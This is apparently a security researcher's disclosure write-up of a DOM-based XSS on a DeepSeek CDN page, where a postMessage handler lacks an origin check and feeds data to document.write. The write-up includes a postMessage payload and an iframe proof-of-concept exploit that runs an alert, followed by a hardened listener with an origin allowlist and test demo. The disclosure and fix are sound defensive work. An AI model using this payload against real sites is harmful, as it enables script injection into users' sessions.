Discovering DOM-Based XSS on DeepSeek.com via postMessage Exploitation
During the use of https://chat.deepseek.com, I identified a DeepSeek CDN URL: https://cdn.deepseek.com/usercontent/usercontent.html
Upon inspecting the page source, I observed the following HTML code:
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
  </head>
  <body>
    <div
      style="
        display: flex;
        align-items: center;
        justify-content: center;
        height: 100vh;
        width: 100%;
      "
    >
      ...
    </div>
    <script>
      window.addEventListener("message", (e) => {
        const keys = Object.keys(e.data);
        if (keys.length !== 1) return;
        if (!e.data.__deepseekCodeBlock) return;
        document.open();
        document.write(e.data.__deepseekCodeBlock);
        document.close();
        const style = document.createElement("style");
        style.textContent = "body { margin: 0; }";
        document.head.appendChild(style);
      });
      window.addEventListener("load", () => {
        window.parent.postMessage({ pageLoaded: true }, "*");
      });
    </script>
  </body>
</html>
Screenshot:
As observed, the message handler (referred to here as handlePostMessage; in the page it is an anonymous arrow function) lacks origin validation. It only checks that e.data has exactly one key and that __deepseekCodeBlock is present; it never inspects e.origin or e.source, so any page that can obtain a reference to this window (for example by framing it) can deliver a message that is accepted.
The vulnerable code is as follows:
document.write(e.data.__deepseekCodeBlock)
document.write replaces the entire document with the supplied string, without any sanitization, so any <script> it contains executes in the origin of cdn.deepseek.com. To demonstrate the vulnerability, I used the following payload:
postMessage( { __deepseekCodeBlock: '<script>alert(origin)</script>' } ,"*")
Screenshot:
Exploit code:
<!-- DOM XSS at deepseek.com by [email protected] -->
<iframe
  width="600px"
  height="600px"
  src="https://cdn.deepseek.com/usercontent/usercontent.html"
  onload="this.contentWindow.postMessage( ({ __deepseekCodeBlock: '<script>alert(origin)</script>'}) ,'*') "
>
</iframe>
Video screenshot
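For comparison, here is a hardened version of the listener, added as an example for this write-up; it is not DeepSeek's code. The root cause above is the missing e.origin check, so the fix keeps the original shape check (exactly one key, __deepseekCodeBlock present) and adds an origin allowlist plus a type check before anything is written. The allowlist entry https://chat.deepseek.com, the helper names, the injected `writer` callback and the fake window object are assumptions made so the decision logic can run and be tested under Node without a DOM.

```javascript
// Added example, not the original usercontent.html code.
// Assumed: only the chat front-end should be able to post code blocks to this page.
const ALLOWED_ORIGINS = new Set(["https://chat.deepseek.com"]);

// Decide whether a message event may be rendered. Pure function so it can be unit-tested.
function acceptCodeBlockMessage(event, allowedOrigins = ALLOWED_ORIGINS) {
  // 1. Origin check: the original handler never looked at e.origin, which is the root cause.
  if (typeof event.origin !== "string" || !allowedOrigins.has(event.origin)) {
    return { ok: false, reason: "untrusted-origin" };
  }
  // 2. Shape check, as in the original handler: exactly one key, and it must be __deepseekCodeBlock.
  const data = event.data;
  if (data === null || typeof data !== "object") {
    return { ok: false, reason: "bad-shape" };
  }
  const keys = Object.keys(data);
  if (keys.length !== 1 || keys[0] !== "__deepseekCodeBlock") {
    return { ok: false, reason: "bad-shape" };
  }
  // 3. Type check: the original accepted any truthy value; only a string makes sense for document.write.
  if (typeof data.__deepseekCodeBlock !== "string") {
    return { ok: false, reason: "bad-type" };
  }
  return { ok: true, html: data.__deepseekCodeBlock };
}

// Install the listener. `writer` is injected so the logic runs without a DOM; in the real page
// it would be the document.open()/document.write()/document.close() sequence.
function installCodeBlockListener(win, writer, allowedOrigins = ALLOWED_ORIGINS) {
  win.addEventListener("message", (e) => {
    const verdict = acceptCodeBlockMessage(e, allowedOrigins);
    if (!verdict.ok) return; // silently drop anything that fails the checks
    writer(verdict.html);
  });
}

// Minimal stand-in for `window`, constructed for this example, so the block runs under Node.
function makeFakeWindow() {
  const listeners = [];
  return {
    addEventListener(type, fn) {
      if (type === "message") listeners.push(fn);
    },
    dispatch(event) {
      listeners.forEach((fn) => fn(event));
    },
  };
}

// Replay two constructed events: one from the trusted embedder, one from an arbitrary third-party
// page sending the same payload the write-up used. Returns what would have been written.
function demo() {
  const win = makeFakeWindow();
  const written = [];
  installCodeBlockListener(win, (html) => written.push(html));
  win.dispatch({
    origin: "https://chat.deepseek.com",
    data: { __deepseekCodeBlock: "<pre>console.log(1)</pre>" },
  });
  win.dispatch({
    origin: "https://third-party.example", // constructed untrusted origin
    data: { __deepseekCodeBlock: "<script>alert(origin)</script>" },
  });
  return written;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo()); // only the trusted message reaches the writer
}
```

Running the block prints a single entry, the <pre> block from the trusted origin; the message from the untrusted origin is dropped before document.write is ever reached. In the real page, comparing e.source against window.parent would add a second, independent check, and rendering the code block inside a sandboxed frame rather than rewriting the page's own document would limit what a bypass could achieve.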
Happy hacking :)